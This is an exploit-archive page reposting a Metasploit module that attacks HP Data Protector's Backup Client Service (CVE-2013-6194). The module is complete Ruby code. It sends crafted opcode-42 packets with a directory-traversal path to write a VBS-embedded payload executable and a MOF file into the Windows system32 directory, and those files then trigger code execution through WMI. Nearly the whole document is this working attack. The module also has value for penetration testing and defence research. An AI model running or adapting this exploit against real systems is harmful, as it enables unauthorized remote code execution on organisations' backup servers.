首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Data Protector Backup Client Service Directory Traversal
来源:metasploit.com 作者:vazquez 发布时间:2014-01-21  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Data Protector Backup Client Service Directory Traversal',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the Hewlett-Packard Data
        Protector product. The vulnerability exists at the Backup Client Service (OmniInet.exe)
        when parsing packets with opcode 42. This module has been tested successfully on HP Data
        Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.
      },
      'Author'         =>
        [
          'Brian Gorenc', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-6194' ],
          [ 'OSVDB', '101630' ],
          [ 'BID', '64647' ],
          [ 'ZDI', '14-003' ],
          [ 'URL' , 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 2048, # Payload embedded into an exe
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'WfsDelay' => 5
        },
      'Platform'        => 'win',
      'Targets'         =>
        [
          [ 'HP Data Protector 6.20 build 370 / Windows 2003 SP2', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 02 2014'))

    register_options([Opt::RPORT(5555)], self.class)
  end

  def check
    fingerprint = get_fingerprint

    if fingerprint.nil?
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - HP Data Protector version #{fingerprint}")

    if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
      minor = $1.to_i
    else
      return Exploit::CheckCode::Safe
    end

    if minor < 21
      return Exploit::CheckCode::Vulnerable
    elsif minor == 21
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Detected
    end

  end

  def exploit
    # Setup the necessary files to do the wbemexec trick
    vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
    exe      = generate_payload_exe
    vbs      = Msf::Util::EXE.to_exe_vbs(exe)
    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
    mof      = generate_mof(mof_name, vbs_name)

    # We can't upload binary contents, so embedding the exe into a VBS.
    print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...")
    upload_file("windows\\system32\\#{vbs_name}", vbs)
    register_file_for_cleanup(vbs_name)

    print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}")
    upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
    register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def build_pkt(fields)
    data = "\xff\xfe" # BOM Unicode
    fields.each do |v|
      data << "#{Rex::Text.to_unicode(v)}\x00\x00"
      data << Rex::Text.to_unicode(" ") # Separator
    end

    data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
    return [data.length].pack("N") + data
  end

  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    disconnect

    if resp.nil?
      return nil
    end

    return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl
  end

  def upload_file(file_name, contents)
    connect
    pkt = build_pkt([
      "2", # Message Type
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      rand_text_alpha(8),
      "42", # Opcode
      rand_text_alpha(8), # command
      rand_text_alpha(8), # rissServerName
      rand_text_alpha(8), # rissServerPort
      "\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
      contents # Certificate contents
    ])
    sock.put(pkt)
    sock.get_once
    # You cannot be confident about the response to guess if upload
    # has been successful or not. While testing, different result codes,
    # including also no response because of timeout due to a process
    # process execution after file write on the target
    disconnect
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ASUS RT-N56U Remote Root
·NCH Software Express Burn Plus
·Ammyy Admin 3.2 Access Bypass
·MW6 Technologies Aztec ActiveX
·MuPDF 1.3 - Stack-based Buffer
·MW6 Technologies DataMatrix Ac
·haneWIN DNS Server 1.5.3 - Den
·MW6 Technologies MaxiCode Acti
·SoapUI 4.6.3 - Remote Code Exe
·Daum Game 1.1.0.5 ActiveX (Ico
·SerComm Device Remote Code Exe
·Ammyy Admin 3.2 - Authenticati
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved